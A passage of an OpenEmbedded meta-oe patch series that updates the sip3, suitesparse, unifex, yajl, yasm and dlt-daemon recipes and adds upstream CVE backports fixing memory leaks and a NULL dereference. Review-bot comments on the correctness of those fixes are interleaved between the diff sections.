TK_GETBUFFERCODE = 295, +- TK_RELEASEBUFFERCODE = 296, +- TK_READBUFFERCODE = 297, +- TK_WRITEBUFFERCODE = 298, +- TK_SEGCOUNTCODE = 299, +- TK_CHARBUFFERCODE = 300, +- TK_PICKLECODE = 301, +- TK_VIRTUALCALLCODE = 302, +- TK_METHODCODE = 303, +- TK_PREMETHODCODE = 304, +- TK_INSTANCECODE = 305, +- TK_FROMTYPE = 306, +- TK_TOTYPE = 307, +- TK_TOSUBCLASS = 308, +- TK_INCLUDE = 309, +- TK_OPTINCLUDE = 310, +- TK_IMPORT = 311, +- TK_EXPHEADERCODE = 312, +- TK_MODHEADERCODE = 313, +- TK_TYPEHEADERCODE = 314, +- TK_MODULE = 315, +- TK_CMODULE = 316, +- TK_CONSMODULE = 317, +- TK_COMPOMODULE = 318, +- TK_CLASS = 319, +- TK_STRUCT = 320, +- TK_PUBLIC = 321, +- TK_PROTECTED = 322, +- TK_PRIVATE = 323, +- TK_SIGNALS = 324, +- TK_SIGNAL_METHOD = 325, +- TK_SLOTS = 326, +- TK_SLOT_METHOD = 327, +- TK_BOOL = 328, +- TK_SHORT = 329, +- TK_INT = 330, +- TK_LONG = 331, +- TK_FLOAT = 332, +- TK_DOUBLE = 333, +- TK_CHAR = 334, +- TK_WCHAR_T = 335, +- TK_VOID = 
336, +- TK_PYOBJECT = 337, +- TK_PYTUPLE = 338, +- TK_PYLIST = 339, +- TK_PYDICT = 340, +- TK_PYCALLABLE = 341, +- TK_PYSLICE = 342, +- TK_PYTYPE = 343, +- TK_PYBUFFER = 344, +- TK_VIRTUAL = 345, +- TK_ENUM = 346, +- TK_SIGNED = 347, +- TK_UNSIGNED = 348, +- TK_SCOPE = 349, +- TK_LOGICAL_OR = 350, +- TK_CONST = 351, +- TK_STATIC = 352, +- TK_SIPSIGNAL = 353, +- TK_SIPSLOT = 354, +- TK_SIPANYSLOT = 355, +- TK_SIPRXCON = 356, +- TK_SIPRXDIS = 357, +- TK_SIPSLOTCON = 358, +- TK_SIPSLOTDIS = 359, +- TK_SIPSSIZET = 360, +- TK_SIZET = 361, +- TK_NUMBER_VALUE = 362, +- TK_REAL_VALUE = 363, +- TK_TYPEDEF = 364, +- TK_NAMESPACE = 365, +- TK_TIMELINE = 366, +- TK_PLATFORMS = 367, +- TK_FEATURE = 368, +- TK_LICENSE = 369, +- TK_QCHAR_VALUE = 370, +- TK_TRUE_VALUE = 371, +- TK_FALSE_VALUE = 372, +- TK_NULL_VALUE = 373, +- TK_OPERATOR = 374, +- TK_THROW = 375, +- TK_QOBJECT = 376, +- TK_EXCEPTION = 377, +- TK_RAISECODE = 378, +- TK_EXPLICIT = 379, +- TK_TEMPLATE = 380, +- TK_FINAL = 381, +- TK_ELLIPSIS = 382, +- TK_DEFMETATYPE = 383, +- TK_DEFSUPERTYPE = 384, +- TK_PROPERTY = 385, +- TK_HIDE_NS = 386, +- TK_FORMAT = 387, +- TK_GET = 388, +- TK_ID = 389, +- TK_KWARGS = 390, +- TK_LANGUAGE = 391, +- TK_LICENSEE = 392, +- TK_NAME = 393, +- TK_OPTIONAL = 394, +- TK_ORDER = 395, +- TK_REMOVELEADING = 396, +- TK_SET = 397, +- TK_SIGNATURE = 398, +- TK_TIMESTAMP = 399, +- TK_TYPE = 400, +- TK_USEARGNAMES = 401, +- TK_USELIMITEDAPI = 402, +- TK_ALLRAISEPYEXC = 403, +- TK_CALLSUPERINIT = 404, +- TK_DEFERRORHANDLER = 405, +- TK_VERSION = 406 +- }; ++ enum yytokentype ++ { ++ YYEMPTY = -2, ++ YYEOF = 0, /* "end of file" */ ++ YYerror = 256, /* error */ ++ YYUNDEF = 257, /* "invalid token" */ ++ TK_API = 258, /* TK_API */ ++ TK_AUTOPYNAME = 259, /* TK_AUTOPYNAME */ ++ TK_DEFDOCSTRFMT = 260, /* TK_DEFDOCSTRFMT */ ++ TK_DEFDOCSTRSIG = 261, /* TK_DEFDOCSTRSIG */ ++ TK_DEFENCODING = 262, /* TK_DEFENCODING */ ++ TK_PLUGIN = 263, /* TK_PLUGIN */ ++ TK_VIRTERRORHANDLER = 264, /* 
TK_VIRTERRORHANDLER */ ++ TK_EXPTYPEHINTCODE = 265, /* TK_EXPTYPEHINTCODE */ ++ TK_TYPEHINTCODE = 266, /* TK_TYPEHINTCODE */ ++ TK_DOCSTRING = 267, /* TK_DOCSTRING */ ++ TK_DOC = 268, /* TK_DOC */ ++ TK_EXPORTEDDOC = 269, /* TK_EXPORTEDDOC */ ++ TK_EXTRACT = 270, /* TK_EXTRACT */ ++ TK_MAKEFILE = 271, /* TK_MAKEFILE */ ++ TK_ACCESSCODE = 272, /* TK_ACCESSCODE */ ++ TK_GETCODE = 273, /* TK_GETCODE */ ++ TK_SETCODE = 274, /* TK_SETCODE */ ++ TK_PREINITCODE = 275, /* TK_PREINITCODE */ ++ TK_INITCODE = 276, /* TK_INITCODE */ ++ TK_POSTINITCODE = 277, /* TK_POSTINITCODE */ ++ TK_FINALCODE = 278, /* TK_FINALCODE */ ++ TK_UNITCODE = 279, /* TK_UNITCODE */ ++ TK_UNITPOSTINCLUDECODE = 280, /* TK_UNITPOSTINCLUDECODE */ ++ TK_MODCODE = 281, /* TK_MODCODE */ ++ TK_TYPECODE = 282, /* TK_TYPECODE */ ++ TK_PREPYCODE = 283, /* TK_PREPYCODE */ ++ TK_COPYING = 284, /* TK_COPYING */ ++ TK_MAPPEDTYPE = 285, /* TK_MAPPEDTYPE */ ++ TK_CODELINE = 286, /* TK_CODELINE */ ++ TK_IF = 287, /* TK_IF */ ++ TK_END = 288, /* TK_END */ ++ TK_NAME_VALUE = 289, /* TK_NAME_VALUE */ ++ TK_PATH_VALUE = 290, /* TK_PATH_VALUE */ ++ TK_STRING_VALUE = 291, /* TK_STRING_VALUE */ ++ TK_VIRTUALCATCHERCODE = 292, /* TK_VIRTUALCATCHERCODE */ ++ TK_TRAVERSECODE = 293, /* TK_TRAVERSECODE */ ++ TK_CLEARCODE = 294, /* TK_CLEARCODE */ ++ TK_GETBUFFERCODE = 295, /* TK_GETBUFFERCODE */ ++ TK_RELEASEBUFFERCODE = 296, /* TK_RELEASEBUFFERCODE */ ++ TK_READBUFFERCODE = 297, /* TK_READBUFFERCODE */ ++ TK_WRITEBUFFERCODE = 298, /* TK_WRITEBUFFERCODE */ ++ TK_SEGCOUNTCODE = 299, /* TK_SEGCOUNTCODE */ ++ TK_CHARBUFFERCODE = 300, /* TK_CHARBUFFERCODE */ ++ TK_PICKLECODE = 301, /* TK_PICKLECODE */ ++ TK_VIRTUALCALLCODE = 302, /* TK_VIRTUALCALLCODE */ ++ TK_METHODCODE = 303, /* TK_METHODCODE */ ++ TK_PREMETHODCODE = 304, /* TK_PREMETHODCODE */ ++ TK_INSTANCECODE = 305, /* TK_INSTANCECODE */ ++ TK_FROMTYPE = 306, /* TK_FROMTYPE */ ++ TK_TOTYPE = 307, /* TK_TOTYPE */ ++ TK_TOSUBCLASS = 308, /* TK_TOSUBCLASS */ ++ TK_INCLUDE = 309, 
/* TK_INCLUDE */ ++ TK_OPTINCLUDE = 310, /* TK_OPTINCLUDE */ ++ TK_IMPORT = 311, /* TK_IMPORT */ ++ TK_EXPHEADERCODE = 312, /* TK_EXPHEADERCODE */ ++ TK_MODHEADERCODE = 313, /* TK_MODHEADERCODE */ ++ TK_TYPEHEADERCODE = 314, /* TK_TYPEHEADERCODE */ ++ TK_MODULE = 315, /* TK_MODULE */ ++ TK_CMODULE = 316, /* TK_CMODULE */ ++ TK_CONSMODULE = 317, /* TK_CONSMODULE */ ++ TK_COMPOMODULE = 318, /* TK_COMPOMODULE */ ++ TK_CLASS = 319, /* TK_CLASS */ ++ TK_STRUCT = 320, /* TK_STRUCT */ ++ TK_PUBLIC = 321, /* TK_PUBLIC */ ++ TK_PROTECTED = 322, /* TK_PROTECTED */ ++ TK_PRIVATE = 323, /* TK_PRIVATE */ ++ TK_SIGNALS = 324, /* TK_SIGNALS */ ++ TK_SIGNAL_METHOD = 325, /* TK_SIGNAL_METHOD */ ++ TK_SLOTS = 326, /* TK_SLOTS */ ++ TK_SLOT_METHOD = 327, /* TK_SLOT_METHOD */ ++ TK_BOOL = 328, /* TK_BOOL */ ++ TK_SHORT = 329, /* TK_SHORT */ ++ TK_INT = 330, /* TK_INT */ ++ TK_LONG = 331, /* TK_LONG */ ++ TK_FLOAT = 332, /* TK_FLOAT */ ++ TK_DOUBLE = 333, /* TK_DOUBLE */ ++ TK_CHAR = 334, /* TK_CHAR */ ++ TK_WCHAR_T = 335, /* TK_WCHAR_T */ ++ TK_VOID = 336, /* TK_VOID */ ++ TK_PYOBJECT = 337, /* TK_PYOBJECT */ ++ TK_PYTUPLE = 338, /* TK_PYTUPLE */ ++ TK_PYLIST = 339, /* TK_PYLIST */ ++ TK_PYDICT = 340, /* TK_PYDICT */ ++ TK_PYCALLABLE = 341, /* TK_PYCALLABLE */ ++ TK_PYSLICE = 342, /* TK_PYSLICE */ ++ TK_PYTYPE = 343, /* TK_PYTYPE */ ++ TK_PYBUFFER = 344, /* TK_PYBUFFER */ ++ TK_VIRTUAL = 345, /* TK_VIRTUAL */ ++ TK_ENUM = 346, /* TK_ENUM */ ++ TK_SIGNED = 347, /* TK_SIGNED */ ++ TK_UNSIGNED = 348, /* TK_UNSIGNED */ ++ TK_SCOPE = 349, /* TK_SCOPE */ ++ TK_LOGICAL_OR = 350, /* TK_LOGICAL_OR */ ++ TK_CONST = 351, /* TK_CONST */ ++ TK_STATIC = 352, /* TK_STATIC */ ++ TK_SIPSIGNAL = 353, /* TK_SIPSIGNAL */ ++ TK_SIPSLOT = 354, /* TK_SIPSLOT */ ++ TK_SIPANYSLOT = 355, /* TK_SIPANYSLOT */ ++ TK_SIPRXCON = 356, /* TK_SIPRXCON */ ++ TK_SIPRXDIS = 357, /* TK_SIPRXDIS */ ++ TK_SIPSLOTCON = 358, /* TK_SIPSLOTCON */ ++ TK_SIPSLOTDIS = 359, /* TK_SIPSLOTDIS */ ++ TK_SIPSSIZET = 360, /* TK_SIPSSIZET 
*/ ++ TK_SIZET = 361, /* TK_SIZET */ ++ TK_NUMBER_VALUE = 362, /* TK_NUMBER_VALUE */ ++ TK_REAL_VALUE = 363, /* TK_REAL_VALUE */ ++ TK_TYPEDEF = 364, /* TK_TYPEDEF */ ++ TK_NAMESPACE = 365, /* TK_NAMESPACE */ ++ TK_TIMELINE = 366, /* TK_TIMELINE */ ++ TK_PLATFORMS = 367, /* TK_PLATFORMS */ ++ TK_FEATURE = 368, /* TK_FEATURE */ ++ TK_LICENSE = 369, /* TK_LICENSE */ ++ TK_QCHAR_VALUE = 370, /* TK_QCHAR_VALUE */ ++ TK_TRUE_VALUE = 371, /* TK_TRUE_VALUE */ ++ TK_FALSE_VALUE = 372, /* TK_FALSE_VALUE */ ++ TK_NULL_VALUE = 373, /* TK_NULL_VALUE */ ++ TK_OPERATOR = 374, /* TK_OPERATOR */ ++ TK_THROW = 375, /* TK_THROW */ ++ TK_QOBJECT = 376, /* TK_QOBJECT */ ++ TK_EXCEPTION = 377, /* TK_EXCEPTION */ ++ TK_RAISECODE = 378, /* TK_RAISECODE */ ++ TK_EXPLICIT = 379, /* TK_EXPLICIT */ ++ TK_TEMPLATE = 380, /* TK_TEMPLATE */ ++ TK_FINAL = 381, /* TK_FINAL */ ++ TK_ELLIPSIS = 382, /* TK_ELLIPSIS */ ++ TK_DEFMETATYPE = 383, /* TK_DEFMETATYPE */ ++ TK_DEFSUPERTYPE = 384, /* TK_DEFSUPERTYPE */ ++ TK_PROPERTY = 385, /* TK_PROPERTY */ ++ TK_HIDE_NS = 386, /* TK_HIDE_NS */ ++ TK_FORMAT = 387, /* TK_FORMAT */ ++ TK_GET = 388, /* TK_GET */ ++ TK_ID = 389, /* TK_ID */ ++ TK_KWARGS = 390, /* TK_KWARGS */ ++ TK_LANGUAGE = 391, /* TK_LANGUAGE */ ++ TK_LICENSEE = 392, /* TK_LICENSEE */ ++ TK_NAME = 393, /* TK_NAME */ ++ TK_OPTIONAL = 394, /* TK_OPTIONAL */ ++ TK_ORDER = 395, /* TK_ORDER */ ++ TK_REMOVELEADING = 396, /* TK_REMOVELEADING */ ++ TK_SET = 397, /* TK_SET */ ++ TK_SIGNATURE = 398, /* TK_SIGNATURE */ ++ TK_TIMESTAMP = 399, /* TK_TIMESTAMP */ ++ TK_TYPE = 400, /* TK_TYPE */ ++ TK_USEARGNAMES = 401, /* TK_USEARGNAMES */ ++ TK_PYSSIZETCLEAN = 402, /* TK_PYSSIZETCLEAN */ ++ TK_USELIMITEDAPI = 403, /* TK_USELIMITEDAPI */ ++ TK_ALLRAISEPYEXC = 404, /* TK_ALLRAISEPYEXC */ ++ TK_CALLSUPERINIT = 405, /* TK_CALLSUPERINIT */ ++ TK_DEFERRORHANDLER = 406, /* TK_DEFERRORHANDLER */ ++ TK_VERSION = 407 /* TK_VERSION */ ++ }; ++ typedef enum yytokentype yytoken_kind_t; + #endif +-/* Tokens. 
*/ ++/* Token kinds. */ ++#define YYEMPTY -2 ++#define YYEOF 0 ++#define YYerror 256 ++#define YYUNDEF 257 + #define TK_API 258 + #define TK_AUTOPYNAME 259 + #define TK_DEFDOCSTRFMT 260 +@@ -335,19 +356,19 @@ + #define TK_TIMESTAMP 399 + #define TK_TYPE 400 + #define TK_USEARGNAMES 401 +-#define TK_USELIMITEDAPI 402 +-#define TK_ALLRAISEPYEXC 403 +-#define TK_CALLSUPERINIT 404 +-#define TK_DEFERRORHANDLER 405 +-#define TK_VERSION 406 +- +- +- ++#define TK_PYSSIZETCLEAN 402 ++#define TK_USELIMITEDAPI 403 ++#define TK_ALLRAISEPYEXC 404 ++#define TK_CALLSUPERINIT 405 ++#define TK_DEFERRORHANDLER 406 ++#define TK_VERSION 407 + ++/* Value type. */ + #if ! defined YYSTYPE && ! defined YYSTYPE_IS_DECLARED +-typedef union YYSTYPE +-#line 202 "sip-4.19.23/sipgen/metasrc/parser.y" ++union YYSTYPE + { ++#line 202 "parser.y" ++ + char qchar; + char *text; + long number; +@@ -390,14 +411,20 @@ typedef union YYSTYPE + variableCfg variable; + vehCfg veh; + int token; +-} +-/* Line 1529 of yacc.c. */ +-#line 396 "sip-4.19.23/sipgen/parser.h" +- YYSTYPE; +-# define yystype YYSTYPE /* obsolescent; will be withdrawn */ +-# define YYSTYPE_IS_DECLARED 1 ++ ++#line 416 "../parser.h" ++ ++}; ++typedef union YYSTYPE YYSTYPE; + # define YYSTYPE_IS_TRIVIAL 1 ++# define YYSTYPE_IS_DECLARED 1 + #endif + ++ + extern YYSTYPE yylval; + ++ ++int yyparse (void); ++ ++ ++#endif /* !YY_YY_PARSER_H_INCLUDED */ diff --git a/meta-oe/recipes-devtools/sip/sip3_4.19.23.bb b/meta-oe/recipes-devtools/sip/sip3_4.19.23.bb index d6335585e2..dc3db1fcd4 100644 --- a/meta-oe/recipes-devtools/sip/sip3_4.19.23.bb +++ b/meta-oe/recipes-devtools/sip/sip3_4.19.23.bb 
@@ -5,7 +5,9 @@ LICENSE = "GPL-2.0-or-later" LIC_FILES_CHKSUM = "file://LICENSE-GPL2;md5=e91355d8a6f8bd8f7c699d62863c7303" SRC_URI = "https://www.riverbankcomputing.com/static/Downloads/sip/${PV}/sip-${PV}.tar.gz \ + file://added-the-py_ssize_t_clean-argument-to-the-module-directive.patch \ " + SRC_URI[md5sum] = "70adc0c9734e2d9dcd241d3f931dfc74" SRC_URI[sha256sum] = "22ca9bcec5388114e40d4aafd7ccd0c4fe072297b628d0c5cdfa2f010c0bc7e7" @@ -29,11 +31,28 @@ do_configure:prepend() { echo "sip_inc_dir = ${D}/${includedir}" >> sip.cfg echo "sip_module_dir = ${D}/${libdir}/python%(py_major).%(py_minor)/site-packages" >> sip.cfg echo "sip_sip_dir = ${D}/${datadir}/sip" >> sip.cfg - ${PYTHON} configure.py --configuration sip.cfg --sip-module PyQt5.sip --sysroot ${CONFIGURE_SYSROOT} CC="${CC}" CXX="${CXX}" LINK="${CXX}" STRIP="" LINK_SHLIB="${CXX}" CFLAGS="${CFLAGS}" CXXFLAGS="${CXXFLAGS}" LFLAGS="${LDFLAGS}" + ${PYTHON} configure.py --configuration sip.cfg --destdir /${D}${libdir}/${PYTHON_DIR}/site-packages/ --sip-module PyQt5.sip --sysroot ${CONFIGURE_SYSROOT} CC="${CC}" CXX="${CXX}" LINK="${CXX}" STRIP="" LINK_SHLIB="${CXX}" CFLAGS="${CFLAGS}" CXXFLAGS="${CXXFLAGS}" LFLAGS="${LDFLAGS}" } do_install() { oe_runmake install + + sed -i \ + -e "s@[^ ]*-fdebug-prefix-map=[^ ']*@@g" \ + -e "s@[^ ]*-fmacro-prefix-map=[^ ']*@@g" \ + -e "s@[^ ]*-ffile-prefix-map=[^ ']*@@g" \ + ${D}${libdir}/${PYTHON_DIR}/site-packages/sipconfig.py + + # Remove the destination directory + sed -i -e "s@${D}/@@g" ${D}${libdir}/${PYTHON_DIR}/site-packages/sipconfig.py + + if [ -n "${STAGING_DIR_NATIVE}" ]; then + sed -i -e "s@${STAGING_DIR_NATIVE}@@g" ${D}${libdir}/${PYTHON_DIR}/site-packages/sipconfig.py + fi + + if [ -n "${STAGING_DIR_TARGET}" ]; then + sed -i -e "s@${STAGING_DIR_TARGET}@@g" ${D}${libdir}/${PYTHON_DIR}/site-packages/sipconfig.py + fi } FILES:python3-sip3 = "${libdir}/${PYTHON_DIR}/site-packages/" 
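Review bot: The `s@${D}/@@g` substitution in `do_install` only leaves absolute target paths in `sipconfig.py` because the build paths are written with a doubled slash (`${D}/${includedir}` in `sip.cfg`, `--destdir /${D}${libdir}/...` on the configure line). That coupling is not documented, so someone tidying the leading `/` in `--destdir` would end up with relative paths in the packaged file. I would add a comment above the sed such as `# ${D} is always followed by an extra "/" in do_configure, so stripping "${D}/" leaves absolute target paths`. The recipe variables are also interpolated into the sed expression as regular expressions, so a work directory containing `@` or regex metacharacters would change what is stripped. A final `grep` for `${TMPDIR}` in `sipconfig.py` would catch any build-host path that still reaches the package.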
diff --git a/meta-oe/recipes-devtools/suitesparse/suitesparse_5.10.1.bb b/meta-oe/recipes-devtools/suitesparse/suitesparse_5.10.1.bb index 38e34b93c6..56cbfce20e 100644 --- a/meta-oe/recipes-devtools/suitesparse/suitesparse_5.10.1.bb +++ b/meta-oe/recipes-devtools/suitesparse/suitesparse_5.10.1.bb @@ -1,6 +1,6 @@ LICENSE = "GPL-2.0-only & GPL-3.0-only & BSD-3-Clause & LGPL-2.0-only & Apache-2.0" LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=5fa987762101f748a6cdd951b64ffc6b" -SRC_URI = "git://github.com/DrTimothyAldenDavis/SuiteSparse;protocol=https;branch=master \ +SRC_URI = "git://github.com/DrTimothyAldenDavis/SuiteSparse;protocol=https;branch=stable \ file://0001-Preserve-CXXFLAGS-from-environment-in-Mongoose.patch \ file://0002-Preserve-links-when-installing-libmetis.patch \ file://0003-Add-version-information-to-libmetis.patch \ diff --git a/meta-oe/recipes-devtools/unifex/unifex_git.bb b/meta-oe/recipes-devtools/unifex/unifex_git.bb index 85fe39b6de..f55d7e32c8 100644 --- a/meta-oe/recipes-devtools/unifex/unifex_git.bb +++ b/meta-oe/recipes-devtools/unifex/unifex_git.bb @@ -20,5 +20,3 @@ EXTRA_OECMAKE += " \ -DCMAKE_CXX_STANDARD=20 \ -DUNIFEX_BUILD_EXAMPLES=OFF \ " - -BBCLASSEXTEND = "native nativesdk" diff --git a/meta-oe/recipes-devtools/yajl/yajl/CVE-2023-33460.patch b/meta-oe/recipes-devtools/yajl/yajl/CVE-2023-33460.patch new file mode 100644 index 0000000000..169784d427 --- /dev/null +++ b/meta-oe/recipes-devtools/yajl/yajl/CVE-2023-33460.patch 
@@ -0,0 +1,29 @@ +From 23a122eddaa28165a6c219000adcc31ff9a8a698 Mon Sep 17 00:00:00 2001 +From: "zhang.jiujiu" <282627424@qq.com> +Date: Tue, 7 Dec 2021 22:37:02 +0800 +Subject: [PATCH] fix memory leaks + +Upstream-Status: Backport [https://github.com/openEuler-BaseService/yajl/commit/23a122eddaa28165a6c219000adcc31ff9a8a698] +CVE: CVE-2023-33460 +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> +--- + src/yajl_tree.c | 3 +++ + 1 file changed, 3 insertions(+) + +diff --git a/src/yajl_tree.c b/src/yajl_tree.c +index 3d357a3..a71167e 100644 +--- a/src/yajl_tree.c ++++ b/src/yajl_tree.c +@@ -445,6 +445,9 @@ yajl_val yajl_tree_parse (const char *input, + YA_FREE(&(handle->alloc), internal_err_str); + } + yajl_free (handle); ++ //If the requested memory is not released in time, it will cause memory leakage ++ if(ctx.root) ++ yajl_tree_free(ctx.root); + return NULL; + } + +-- +2.25.1 + diff --git a/meta-oe/recipes-devtools/yajl/yajl_2.1.0.bb b/meta-oe/recipes-devtools/yajl/yajl_2.1.0.bb index cf8dbb183e..697f54d9fb 100644 --- a/meta-oe/recipes-devtools/yajl/yajl_2.1.0.bb +++ b/meta-oe/recipes-devtools/yajl/yajl_2.1.0.bb @@ -8,7 +8,9 @@ HOMEPAGE = "http://lloyd.github.com/yajl/" LICENSE = "ISC" LIC_FILES_CHKSUM = "file://COPYING;md5=39af6eb42999852bdd3ea00ad120a36d" -SRC_URI = "git://github.com/lloyd/yajl;branch=master;protocol=https" +SRC_URI = "git://github.com/lloyd/yajl;branch=master;protocol=https \ + file://CVE-2023-33460.patch \ + " SRCREV = "a0ecdde0c042b9256170f2f8890dd9451a4240aa" S = "${WORKDIR}/git" diff --git a/meta-oe/recipes-devtools/yasm/yasm/CVE-2023-31975.patch b/meta-oe/recipes-devtools/yasm/yasm/CVE-2023-31975.patch new file mode 100644 index 0000000000..ae10e99c2f --- /dev/null +++ b/meta-oe/recipes-devtools/yasm/yasm/CVE-2023-31975.patch 
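Review bot: The cleanup added to the error path of `yajl_tree_parse` releases only `ctx.root`, and the hunk does not show whether that is the only place a partially built tree can live when parsing fails midway. The rest of the function is outside the hunk, so this is an inference to confirm: if values under construction are tracked elsewhere in `ctx` (for example on a context stack), they would still leak after this backport and the CVE would be only partly addressed. Running the tree parser on a truncated document under a leak checker would settle it. A comment stating the intent, e.g. `/* parse failed: release whatever part of the tree was already attached to ctx */`, would be clearer than the current `//` line.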
@@ -0,0 +1,29 @@
+From b2cc5a1693b17ac415df76d0795b15994c106441 Mon Sep 17 00:00:00 2001
+From: Katsuhiko Gondow <gondow@cs.titech.ac.jp>
+Date: Tue, 13 Jun 2023 05:00:47 +0900
+Subject: [PATCH] Fix memory leak in bin-objfmt (#231)
+
+Upstream-Status: Backport [https://github.com/yasm/yasm/commit/b2cc5a1693b17ac415df76d0795b15994c106441]
+
+CVE: CVE-2023-31975
+---
+ modules/objfmts/bin/bin-objfmt.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/modules/objfmts/bin/bin-objfmt.c b/modules/objfmts/bin/bin-objfmt.c
+index 18026750..a38c3422 100644
+--- a/modules/objfmts/bin/bin-objfmt.c
++++ b/modules/objfmts/bin/bin-objfmt.c
+@@ -1680,6 +1680,10 @@ static void
+ bin_section_data_destroy(void *data)
+ {
+ bin_section_data *bsd = (bin_section_data *)data;
++ if (bsd->align)
++ yasm_xfree(bsd->align);
++ if (bsd->valign)
++ yasm_xfree(bsd->valign);
+ if (bsd->start)
+ yasm_expr_destroy(bsd->start);
+ if (bsd->vstart)
+--
+2.40.0
diff --git a/meta-oe/recipes-devtools/yasm/yasm/CVE-2023-37732.patch b/meta-oe/recipes-devtools/yasm/yasm/CVE-2023-37732.patch
new file mode 100644
index 0000000000..1ca33f0a92
--- /dev/null
+++ b/meta-oe/recipes-devtools/yasm/yasm/CVE-2023-37732.patch
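Review bot: `bsd->align` and `bsd->valign` are released with a plain `yasm_xfree()`, while the neighbouring `start` and `vstart` fields in `bin_section_data_destroy` go through a type-specific destructor (`yasm_expr_destroy`). The field declarations are outside the hunk, so this is to be confirmed. If the two fields are `yasm_intnum` objects, a plain free releases the struct but not any storage the intnum itself owns, and `yasm_intnum_destroy(bsd->align);` (likewise for `valign`) would be the matching call. Since this is a verbatim upstream backport, any deviation belongs in the patch header next to `Upstream-Status`. The embedded patch also has no `Signed-off-by:` line from the person who backported it, unlike the other CVE patches in this change.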
@@ -0,0 +1,41 @@ +From 2cd3bb50e256f5ed5f611ac611d25fe673f2cec3 Mon Sep 17 00:00:00 2001 +From: Peter Johnson <johnson.peter@gmail.com> +Date: Fri, 11 Aug 2023 10:49:51 +0000 +Subject: [PATCH] elf.c: Fix NULL deref on bad xsize expression (#234) + +CVE: CVE-2023-37732 + +Upstream-Status: Backport [https://github.com/yasm/yasm/commit/2cd3bb50e256f5ed5f611ac611d25fe673f2cec3] + +Signed-off-by: Soumya <soumya.sambu@windriver.com> +--- + modules/objfmts/elf/elf.c | 10 +++++----- + 1 file changed, 5 insertions(+), 5 deletions(-) + +diff --git a/modules/objfmts/elf/elf.c b/modules/objfmts/elf/elf.c +index 2486bba8..bab4c9ca 100644 +--- a/modules/objfmts/elf/elf.c ++++ b/modules/objfmts/elf/elf.c +@@ -482,15 +482,15 @@ elf_symtab_write_to_file(FILE *f, elf_symtab_head *symtab, + + /* get size (if specified); expr overrides stored integer */ + if (entry->xsize) { +- size_intn = yasm_intnum_copy( +- yasm_expr_get_intnum(&entry->xsize, 1)); +- if (!size_intn) { ++ yasm_intnum *intn = yasm_expr_get_intnum(&entry->xsize, 1); ++ if (!intn) { + yasm_error_set(YASM_ERROR_VALUE, + N_("size specifier not an integer expression")); + yasm_errwarn_propagate(errwarns, entry->xsize->line); +- } ++ } else ++ size_intn = yasm_intnum_copy(intn); + } +- else ++ if (!size_intn) + size_intn = yasm_intnum_create_uint(entry->size); + + /* get EQU value for constants */ +-- +2.40.0 diff --git a/meta-oe/recipes-devtools/yasm/yasm_git.bb b/meta-oe/recipes-devtools/yasm/yasm_git.bb index 044fcbea74..60b00f7ff4 100644 --- a/meta-oe/recipes-devtools/yasm/yasm_git.bb +++ b/meta-oe/recipes-devtools/yasm/yasm_git.bb @@ -11,6 +11,8 @@ PV = "1.3.0+git${SRCPV}" SRCREV = "ba463d3c26c0ece2e797b8d6381b161633b5971a" SRC_URI = "git://github.com/yasm/yasm.git;branch=master;protocol=https \ file://0001-Do-not-use-AC_HEADER_STDC.patch \ + file://CVE-2023-31975.patch \ + file://CVE-2023-37732.patch \ " S = "${WORKDIR}/git" 
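Review bot: The new fallback `if (!size_intn)` in `elf_symtab_write_to_file` is evaluated on every path, including when `entry->xsize` is NULL, whereas the old `else` branch assigned `size_intn` unconditionally in that case. The fix is therefore only correct if `size_intn` is NULL on entry to this block for each symbol-table entry. Its declaration is outside the hunk, so confirm it is initialised per iteration, e.g. `yasm_intnum *size_intn = NULL;` inside the loop. If it were declared once outside the loop, a pointer left from a previous entry would suppress the fallback and be reused. A one-line comment at the fallback, `/* also reached when the xsize expression was not an integer */`, would make the error-recovery intent explicit.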
diff --git a/meta-oe/recipes-extended/dlt-daemon/dlt-daemon/0001-Fix-memory-leak.patch b/meta-oe/recipes-extended/dlt-daemon/dlt-daemon/0001-Fix-memory-leak.patch
new file mode 100644
index 0000000000..72e3b9802d
--- /dev/null
+++ b/meta-oe/recipes-extended/dlt-daemon/dlt-daemon/0001-Fix-memory-leak.patch
@@ -0,0 +1,34 @@
+From b6149e203f919c899fefc702a17fbb78bdec3700 Mon Sep 17 00:00:00 2001
+From: Le Van Khanh <Khanh.LeVan@vn.bosch.com>
+Date: Thu, 9 Feb 2023 03:17:13 -0500
+Subject: [PATCH] Fix memory leak
+
+Free the ecuid_conf in case of memory alllocated
+
+CVE: CVE-2023-26257
+
+Upstream-Status: Backport
+[https://github.com/COVESA/dlt-daemon/pull/441/commits/b6149e203f919c899fefc702a17fbb78bdec3700]
+
+Signed-off-by: Le Van Khanh <Khanh.LeVan@vn.bosch.com>
+
+Signed-off-by: Yogita Urade <yogita.urade@windriver.com>
+---
+ src/console/dlt-control-common.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/src/console/dlt-control-common.c b/src/console/dlt-control-common.c
+index abcaf92..64951c1 100644
+--- a/src/console/dlt-control-common.c
++++ b/src/console/dlt-control-common.c
+@@ -124,6 +124,8 @@ void set_ecuid(char *ecuid)
+ if (dlt_parse_config_param("ECUId", &ecuid_conf) == 0) {
+ memset(local_ecuid, 0, DLT_CTRL_ECUID_LEN);
+ strncpy(local_ecuid, ecuid_conf, DLT_CTRL_ECUID_LEN);
++ if (ecuid_conf !=NULL)
++ free(ecuid_conf);
+ local_ecuid[DLT_CTRL_ECUID_LEN - 1] = '\0';
+ }
+ else {
+--
+2.34.1
diff --git a/meta-oe/recipes-extended/dlt-daemon/dlt-daemon_2.18.8.bb b/meta-oe/recipes-extended/dlt-daemon/dlt-daemon_2.18.8.bb
index 7a613bcc93..b98cfadf3e 100644
--- a/meta-oe/recipes-extended/dlt-daemon/dlt-daemon_2.18.8.bb
+++ b/meta-oe/recipes-extended/dlt-daemon/dlt-daemon_2.18.8.bb
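Review bot: In `set_ecuid`, `ecuid_conf` is handed to `strncpy()` on the line before the added `if (ecuid_conf !=NULL)` test, so the test comes too late to protect the copy. It is also unnecessary for `free()`, which accepts NULL. Either guard the copy itself, `if (ecuid_conf != NULL) strncpy(local_ecuid, ecuid_conf, DLT_CTRL_ECUID_LEN);`, or drop the test and call `free(ecuid_conf);` unconditionally after the copy. The leak is closed only in the success branch; whether `dlt_parse_config_param` can leave an allocation behind when it returns non-zero is not visible here and is worth checking. `set_ecuid` continues outside the hunk.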
